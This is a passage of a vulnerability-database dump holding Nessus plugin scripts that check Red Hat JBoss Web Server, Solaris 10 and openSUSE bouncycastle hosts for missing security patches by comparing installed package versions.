script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd22-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd22-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd22-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd22-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ldap22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-el-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-maven-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-maven-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:3113\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"jws-2\") || rpm_exists(release:\"RHEL7\", rpm:\"jws-2\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss Web Server\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"httpd-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"httpd-debuginfo-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-debuginfo-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"httpd-devel-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-devel-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"httpd-manual-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-manual-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"httpd-tools-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-tools-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-debuginfo-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-debuginfo-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-devel-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-devel-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-libs-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-libs-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-perl-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-perl-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-static-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-static-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_cluster-native-1.2.13-9.Final_redhat_2.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.2.13-9.Final_redhat_2.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_cluster-native-debuginfo-1.2.13-9.Final_redhat_2.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_cluster-native-debuginfo-1.2.13-9.Final_redhat_2.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_ldap-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ldap-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_ssl-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-admin-webapps-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-docs-webapp-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-el-2.1-api-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-javadoc-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-jsp-2.1-api-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-lib-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-log4j-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-maven-devel-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-servlet-2.5-api-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-webapps-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-admin-webapps-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-docs-webapp-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-el-2.2-api-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-javadoc-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-jsp-2.2-api-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-lib-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-log4j-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-maven-devel-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-servlet-3.0-api-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-webapps-7.0.54-28_patch_05.ep6.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd22-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd22-debuginfo-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd22-devel-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd22-manual-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd22-tools-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-debuginfo-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-devel-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-libs-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-perl-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-static-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.2.13-9.Final_redhat_2.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_cluster-native-debuginfo-1.2.13-9.Final_redhat_2.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_ldap22-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_ssl22-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-admin-webapps-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-docs-webapp-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-el-2.1-api-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-javadoc-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-jsp-2.1-api-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-lib-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-log4j-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-maven-devel-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-servlet-2.5-api-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-webapps-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-admin-webapps-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-docs-webapp-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-el-2.2-api-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-javadoc-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-jsp-2.2-api-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-lib-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-log4j-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-maven-devel-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-servlet-3.0-api-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-webapps-7.0.54-28_patch_05.ep6.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:10", "description": "Indexing and Search Service 1u5-29.15600: core patch.\nDate this patch was last updated by Sun : Jan/07/17", "cvss3": {}, "published": "2018-03-12T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 142824-29", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:142824", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_142824-29.NASL", "href": "https://www.tenable.com/plugins/nessus/107538", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107538);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7940\");\n\n script_name(english:\"Solaris 10 (sparc) : 142824-29\");\n script_summary(english:\"Check for patch 142824-29\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 142824-29\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Indexing and Search Service 1u5-29.15600: core patch.\nDate this patch was last updated by Sun : Jan/07/17\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/142824-29\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 142824-29 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7940\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142824\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"142824-29\", obsoleted_by:\"\", package:\"SUNWjiss\", version:\"1.0,REV=2009.09.09\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjiss\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:46", "description": "bouncycastle was updated to version 1.53 to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-7940: Invalid curve attack (bsc#951727).", "cvss3": {}, "published": "2015-11-05T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bouncycastle (openSUSE-2015-705)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bouncycastle", "p-cpe:/a:novell:opensuse:bouncycastle-javadoc", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2015-705.NASL", "href": "https://www.tenable.com/plugins/nessus/86740", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-705.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86740);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-7940\");\n\n script_name(english:\"openSUSE Security Update : bouncycastle (openSUSE-2015-705)\");\n script_summary(english:\"Check for the openSUSE-2015-705 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"bouncycastle was updated to version 1.53 to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-7940: Invalid curve attack (bsc#951727).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=951727\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bouncycastle packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bouncycastle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bouncycastle-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2|SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2 / 42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bouncycastle-1.53-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bouncycastle-javadoc-1.53-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bouncycastle-1.53-13.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bouncycastle-javadoc-1.53-13.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bouncycastle-1.53-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bouncycastle-javadoc-1.53-16.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bouncycastle / bouncycastle-javadoc\");\n}\n", "cvss": {"score": 0.0, 